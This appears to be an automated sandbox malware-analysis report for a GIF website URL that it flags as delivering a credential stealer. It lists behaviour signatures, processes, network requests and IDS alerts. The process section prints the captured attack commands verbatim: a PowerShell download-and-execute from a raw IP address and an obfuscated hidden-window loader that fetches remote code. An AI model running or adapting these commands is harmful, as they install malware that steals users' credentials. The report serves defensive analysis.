URL:

https://www.gifcen.com/satoru-gojo-gif-61/

Full analysis: https://app.any.run/tasks/ea46eeca-bfaa-44d0-a491-99828df767f9
Verdict: Malicious activity
Threats:

Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns.

Malware Trends Tracker     >>>
Analysis date: January 22, 2026, 19:49:44
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
stealer
python
Indicators:
MD5:

6548F681CD72FD3545DBFF9CE625E133

SHA1:

134DAE929038A73B345D92358E1C26B98533BFBD

SHA256:

579CAA47F5900C3B70662396F4126BA406EAF64FEAFB0BE5129453F773BDB949

SSDEEP:

3:N8DSLCAlmERKtBTMnn:2OLCAlm4Kgn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Use SyncAppvPublishingServer as a Powershell host to execute Powershell code

      • wscript.exe (PID: 3400)
      • wscript.exe (PID: 4064)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 5444)
      • powershell.exe (PID: 1324)

    • Changes powershell execution policy (RemoteSigned)

      • wscript.exe (PID: 3400)
      • wscript.exe (PID: 4064)

    • Uses sleep, probably for evasion detection (SCRIPT)

      • wscript.exe (PID: 4064)

    • Actions looks like stealing of personal data

      • powershell.exe (PID: 8640)

    • Steals credentials from Web Browsers

      • powershell.exe (PID: 8640)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 6232)
      • powershell.exe (PID: 3916)
      • powershell.exe (PID: 772)
      • powershell.exe (PID: 4996)

    • Changes powershell execution policy (Bypass)

      • powershell.exe (PID: 8640)

    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 4996)
      • powershell.exe (PID: 772)
      • powershell.exe (PID: 3916)
      • powershell.exe (PID: 6232)

  • SUSPICIOUS

    • Manipulates environment variables

      • powershell.exe (PID: 5444)
      • powershell.exe (PID: 1324)

    • The process hide an interactive prompt from the user

      • wscript.exe (PID: 3400)
      • wscript.exe (PID: 4064)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 3400)
      • wscript.exe (PID: 4064)

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 3400)
      • wscript.exe (PID: 4064)
      • powershell.exe (PID: 1324)
      • powershell.exe (PID: 8640)

    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 5444)
      • powershell.exe (PID: 8640)
      • powershell.exe (PID: 772)
      • powershell.exe (PID: 3916)
      • powershell.exe (PID: 6232)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 5444)
      • powershell.exe (PID: 772)
      • powershell.exe (PID: 6232)

    • The process executes VB scripts

      • powershell.exe (PID: 5444)

    • Starts process via Powershell

      • powershell.exe (PID: 1324)

    • Executes script without checking the security policy

      • powershell.exe (PID: 1324)
      • powershell.exe (PID: 8640)

    • The process bypasses the loading of PowerShell profile settings

      • powershell.exe (PID: 1324)
      • powershell.exe (PID: 8640)

    • Possible stealing from crypto wallets

      • powershell.exe (PID: 8640)

    • Possible stealing of messenger data

      • powershell.exe (PID: 8640)

    • Possible stealing from browsers

      • powershell.exe (PID: 8640)

    • Possible stealing of email data

      • powershell.exe (PID: 8640)

    • Possible stealing of cloud data

      • powershell.exe (PID: 8640)

    • Possible stealing from password managers

      • powershell.exe (PID: 8640)

    • Possible stealing of FTP data

      • powershell.exe (PID: 8640)

    • Possible stealing from 2fa

      • powershell.exe (PID: 8640)

    • Possible stealing of VPN data

      • powershell.exe (PID: 8640)

    • Possibly malicious use of IEX has been detected

      • powershell.exe (PID: 8640)

    • Application launched itself

      • powershell.exe (PID: 8640)

    • Probably download files using WebClient

      • powershell.exe (PID: 8640)

    • Found IP address in command line

      • powershell.exe (PID: 6232)
      • powershell.exe (PID: 3916)
      • powershell.exe (PID: 772)
      • powershell.exe (PID: 4996)

    • Extracts files to a directory (POWERSHELL)

      • powershell.exe (PID: 772)

    • Gets path to any of the special folders (POWERSHELL)

      • powershell.exe (PID: 3916)
      • powershell.exe (PID: 772)

    • Possible path obfuscation (POWERSHELL)

      • powershell.exe (PID: 3916)
      • powershell.exe (PID: 772)

    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 3916)
      • powershell.exe (PID: 772)

    • Receives information about network interfaces and IP addresses (POWERSHELL)

      • powershell.exe (PID: 6232)

    • Process drops python dynamic module

      • powershell.exe (PID: 3916)
      • powershell.exe (PID: 772)

    • The process drops C-runtime libraries

      • powershell.exe (PID: 3916)
      • powershell.exe (PID: 772)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3916)
      • powershell.exe (PID: 772)

    • Process drops legitimate windows executable

      • powershell.exe (PID: 3916)
      • powershell.exe (PID: 772)

    • Loads Python modules

      • dn9b3.exe (PID: 7780)
      • bdsou.exe (PID: 8156)

    • Connects to unusual port

      • bdsou.exe (PID: 8156)

  • INFO

    • Drops script file

      • chrome.exe (PID: 3344)
      • wscript.exe (PID: 3400)
      • powershell.exe (PID: 5444)
      • wscript.exe (PID: 4064)
      • powershell.exe (PID: 1324)
      • powershell.exe (PID: 8640)
      • powershell.exe (PID: 3916)
      • powershell.exe (PID: 4996)
      • powershell.exe (PID: 6232)
      • powershell.exe (PID: 772)

    • Application launched itself

      • chrome.exe (PID: 3344)

    • Checks proxy server information

      • powershell.exe (PID: 5444)
      • powershell.exe (PID: 8640)
      • slui.exe (PID: 5016)
      • powershell.exe (PID: 6232)
      • powershell.exe (PID: 772)
      • powershell.exe (PID: 4996)
      • powershell.exe (PID: 3916)
      • dn9b3.exe (PID: 7780)
      • bdsou.exe (PID: 8156)

    • Connects to unusual port

      • chrome.exe (PID: 6628)

    • Disables trace logs

      • powershell.exe (PID: 5444)
      • powershell.exe (PID: 8640)
      • powershell.exe (PID: 4996)
      • powershell.exe (PID: 772)
      • powershell.exe (PID: 6232)
      • powershell.exe (PID: 3916)
      • dn9b3.exe (PID: 7780)

    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 5444)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 5444)
      • powershell.exe (PID: 1324)
      • powershell.exe (PID: 8640)
      • powershell.exe (PID: 4996)
      • powershell.exe (PID: 6232)

    • Manual execution by a user

      • wscript.exe (PID: 3400)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 8640)
      • powershell.exe (PID: 772)
      • powershell.exe (PID: 3916)
      • powershell.exe (PID: 4996)
      • powershell.exe (PID: 6232)

    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 772)
      • powershell.exe (PID: 6232)

    • Gets a random number, or selects objects randomly from a collection (POWERSHELL)

      • powershell.exe (PID: 772)
      • powershell.exe (PID: 3916)
      • powershell.exe (PID: 6232)

    • User-Agent configuration (POWERSHELL)

      • powershell.exe (PID: 3916)
      • powershell.exe (PID: 772)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 772)
      • powershell.exe (PID: 3916)

    • The sample compiled with english language support

      • powershell.exe (PID: 3916)
      • powershell.exe (PID: 772)

    • The executable file from the user directory is run by the Powershell process

      • dn9b3.exe (PID: 7780)
      • bdsou.exe (PID: 8156)

    • Python executable

      • dn9b3.exe (PID: 7780)
      • bdsou.exe (PID: 8156)

    • Checks supported languages

      • dn9b3.exe (PID: 7780)
      • bdsou.exe (PID: 8156)

    • Reads the machine GUID from the registry

      • dn9b3.exe (PID: 7780)
      • bdsou.exe (PID: 8156)

    • Reads the computer name

      • dn9b3.exe (PID: 7780)
      • bdsou.exe (PID: 8156)

    • Reads Environment values

      • dn9b3.exe (PID: 7780)

    • Reads security settings of Internet Explorer

      • bdsou.exe (PID: 8156)
      • dn9b3.exe (PID: 7780)

    • Creates files or folders in the user directory

      • bdsou.exe (PID: 8156)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
213
Monitored processes
54
Malicious processes
8
Suspicious processes
1

Behavior graph

Click at the process to see the details
start chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs wscript.exe no specs powershell.exe conhost.exe no specs wscript.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs slui.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs msedge.exe no specs powershell.exe powershell.exe powershell.exe powershell.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs dn9b3.exe bdsou.exe svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
148"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --disable-quic --string-annotations --field-trial-handle=2364,i,14909613187005041507,4524374274325320023,262144 --disable-features=HttpsFirstBalancedMode,HttpsFirstModeV2,HttpsOnlyMode,HttpsUpgrades --variations-seed-version=20251218-201203.402000 --mojo-platform-channel-handle=2412 /prefetch:8C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\133.0.6943.127\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
772powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://194.150.220.218/4SLEYpfAk57hGubo/dn9b3')"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
936"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge
Exit code:
0
Version:
133.0.3065.92
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\133.0.3065.92\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1040"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --disable-quic --string-annotations --field-trial-handle=6128,i,14909613187005041507,4524374274325320023,262144 --disable-features=HttpsFirstBalancedMode,HttpsFirstModeV2,HttpsOnlyMode,HttpsUpgrades --variations-seed-version=20251218-201203.402000 --mojo-platform-channel-handle=5984 /prefetch:8C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
1092"C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exepowershell.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
1324"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n;saps C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\?owershell.??? -Arg '-NoP -C & (gal i*************************************************************************************************************?*********************x)(& (gcm *************************************************************************************************************************estM*****************************************************) repl-fabric94.system-api-cloud-application.in.net/748412-crashreport);while(1){sleep 60}' -Wi Hidden}C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1620"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --disable-quic --string-annotations --field-trial-handle=6008,i,14909613187005041507,4524374274325320023,262144 --disable-features=HttpsFirstBalancedMode,HttpsFirstModeV2,HttpsOnlyMode,HttpsUpgrades --variations-seed-version=20251218-201203.402000 --mojo-platform-channel-handle=5228 /prefetch:8C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
2292C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2640"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-US --service-sandbox-type=on_device_model_execution --disable-quic --string-annotations --field-trial-handle=6580,i,14909613187005041507,4524374274325320023,262144 --disable-features=HttpsFirstBalancedMode,HttpsFirstModeV2,HttpsOnlyMode,HttpsUpgrades --variations-seed-version=20251218-201203.402000 --mojo-platform-channel-handle=6632 /prefetch:8C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
2688"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --disable-quic --string-annotations --field-trial-handle=5540,i,14909613187005041507,4524374274325320023,262144 --disable-features=HttpsFirstBalancedMode,HttpsFirstModeV2,HttpsOnlyMode,HttpsUpgrades --variations-seed-version=20251218-201203.402000 --mojo-platform-channel-handle=5052 /prefetch:8C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\133.0.6943.127\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
Total events
54 333
Read events
54 302
Write events
31
Delete events
0

Modification events

(PID) Process:(8640) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(8640) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(8640) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(8640) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(8640) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(8640) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(8640) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(8640) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(8640) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(8640) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableConsoleTracing
Value:
0
Executable files
30
Suspicious files
130
Text files
109
Unknown types
0

Dropped files

PID
Process
Filename
Type
3344chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\ClientCertificates\LOG.old~RF1b3fe4.TMP
MD5:
SHA256:
3344chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\ClientCertificates\LOG.old
MD5:
SHA256:
3344chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\LOG.old~RF1b3ff3.TMP
MD5:
SHA256:
3344chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\LOG.old
MD5:
SHA256:
3344chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\LOG.old~RF1b4013.TMP
MD5:
SHA256:
3344chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\parcel_tracking_db\LOG.old~RF1b4013.TMP
MD5:
SHA256:
3344chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\LOG.old~RF1b4013.TMP
MD5:
SHA256:
3344chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\chrome_cart_db\LOG.old~RF1b4013.TMP
MD5:
SHA256:
3344chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\parcel_tracking_db\LOG.old
MD5:
SHA256:
3344chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\LOG.old
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
215
TCP/UDP connections
158
DNS requests
130
Threats
31

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
6628
chrome.exe
OPTIONS
204
104.18.11.59:443
https://bsc-testnet.drpc.org/
unknown
unknown
6628
chrome.exe
GET
403
172.240.127.234:443
https://impressexaltsculptor.com/e2/4d/21/e24d218fcaf4ffaaf75ba17ee0041b18.js
unknown
unknown
6628
chrome.exe
POST
204
142.251.141.110:443
https://www.google-analytics.com/g/collect?v=2&tid=G-SBQLTNMKMZ&gtm=45je61f0h2v887026193za204zd887026193&_p=1769111392469&gcd=13l3l3l3l1l1&npa=0&dma=0&cid=1929394307.1769111393&ul=en-us&sr=1360x768&uaa=x86&uab=64&uafvl=Not(A%253ABrand%3B99.0.0.0%7CGoogle%2520Chrome%3B133.0.6943.127%7CChromium%3B133.0.6943.127&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&frm=0&pscdl=noapi&_s=1&tag_exp=103116026~103200004~104527906~104528501~104684208~104684211~105391252~115938465~115938469~116185179~116185180~116988315~117041588&sid=1769111392&sct=1&seg=0&dl=https%3A%2F%2Fwww.gifcen.com%2Fsatoru-gojo-gif-61%2F&dt=Satoru%20Gojo%20Gif%20-%20GIFcen&en=page_view&_fv=1&_nsi=1&_ss=1&_ee=1&tfd=1672
unknown
unknown
6628
chrome.exe
GET
200
142.250.185.170:443
https://safebrowsingohttpgateway.googleapis.com/v1/ohttp/hpkekeyconfig?key=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE
unknown
binary
41 b
whitelisted
6628
chrome.exe
GET
200
216.58.212.142:80
http://clients2.google.com/time/1/current?cup2key=8:eiIrx2ThjUNgazX-Z9D-FC6Pbq4vL0L8b5jrex2MUNg&cup2hreq=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
unknown
whitelisted
6628
chrome.exe
GET
200
172.67.150.41:443
https://www.gifcen.com/satoru-gojo-gif-61/
unknown
html
46.8 Kb
unknown
6628
chrome.exe
POST
200
74.125.206.84:443
https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
unknown
text
17 b
whitelisted
6628
chrome.exe
GET
200
172.67.150.41:443
https://www.gifcen.com/wp-content/plugins/wp-rocket/assets/js/lazyload/16.1/lazyload.min.js
unknown
text
7.71 Kb
unknown
6628
chrome.exe
GET
200
172.67.150.41:443
https://www.gifcen.com/wp-content/cache/min/1/ae8e06bb8ff66dcc2d2ff4a2a3f2f1fe.css
unknown
text
85.5 Kb
unknown
6628
chrome.exe
GET
200
74.125.29.94:443
https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=133
unknown
compressed
79.0 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
Not routed
whitelisted
8544
RUXIMICS.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
6768
MoUsoCoreWorker.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
8272
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
5568
SearchApp.exe
2.16.241.205:443
th.bing.com
AKAMAI-ASN1
NL
whitelisted
5568
SearchApp.exe
2.16.241.207:443
th.bing.com
AKAMAI-ASN1
NL
whitelisted
4
System
192.168.100.255:138
Not routed
whitelisted
6628
chrome.exe
74.125.29.94:443
clientservices.googleapis.com
GOOGLE
US
whitelisted
6628
chrome.exe
216.58.212.142:80
clients2.google.com
GOOGLE
US
whitelisted
6628
chrome.exe
142.250.185.170:443
safebrowsingohttpgateway.googleapis.com
GOOGLE
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 4.231.128.59
whitelisted
google.com
  • 142.251.141.78
whitelisted
th.bing.com
  • 2.16.241.205
  • 2.16.241.218
  • 2.16.241.207
  • 2.16.241.201
whitelisted
www.bing.com
  • 2.16.241.207
  • 2.16.241.218
  • 2.16.241.201
  • 2.16.241.205
whitelisted
clients2.google.com
  • 216.58.212.142
whitelisted
clientservices.googleapis.com
  • 74.125.29.94
whitelisted
www.gifcen.com
  • 172.67.150.41
  • 104.21.30.5
unknown
safebrowsingohttpgateway.googleapis.com
  • 142.250.185.170
  • 142.250.185.74
  • 142.250.185.138
  • 142.250.184.234
  • 216.58.206.42
  • 142.251.208.10
  • 142.250.185.202
  • 216.58.212.138
  • 172.217.20.138
  • 142.251.141.74
  • 142.250.185.106
  • 172.217.18.10
  • 216.58.206.74
  • 142.251.141.106
  • 142.251.140.170
  • 142.250.201.74
whitelisted
accounts.google.com
  • 74.125.206.84
whitelisted
impressexaltsculptor.com
  • 172.240.127.234
  • 172.240.108.84
  • 172.240.127.243
  • 172.240.253.132
  • 172.240.127.242
  • 172.240.127.244
  • 172.240.108.68
  • 172.240.108.76
unknown

Threats

PID
Process
Class
Message
6628
chrome.exe
Misc activity
ET INFO Observed Smart Chain Domain in DNS Lookup (bsc-testnet .drpc .org)
6628
chrome.exe
Misc activity
ET INFO Observed Smart Chain Domain in DNS Lookup (bsc-testnet .drpc .org)
6628
chrome.exe
Misc activity
ET INFO Observed Smart Chain Domain in TLS SNI (bsc-testnet .drpc .org)
6628
chrome.exe
Not Suspicious Traffic
INFO [ANY.RUN] Google Tag Manager analytics (googletagmanager .com)
6628
chrome.exe
Not Suspicious Traffic
INFO [ANY.RUN] Google Tag Manager analytics (googletagmanager .com)
6628
chrome.exe
Misc activity
ET INFO Observed Smart Chain Domain in DNS Lookup (data-seed-prebsc-1-s1 .bnbchain .org)
6628
chrome.exe
Misc activity
ET INFO Observed Smart Chain Domain in TLS SNI (data-seed-prebsc-1-s1 .bnbchain .org)
6628
chrome.exe
Misc activity
ET INFO External IP Lookup Service in DNS Query (ip-info .ff .avast .com)
6628
chrome.exe
Misc activity
ET INFO Observed External IP Lookup Domain (ip-info .ff .avast .com) in TLS SNI
6628
chrome.exe
Misc activity
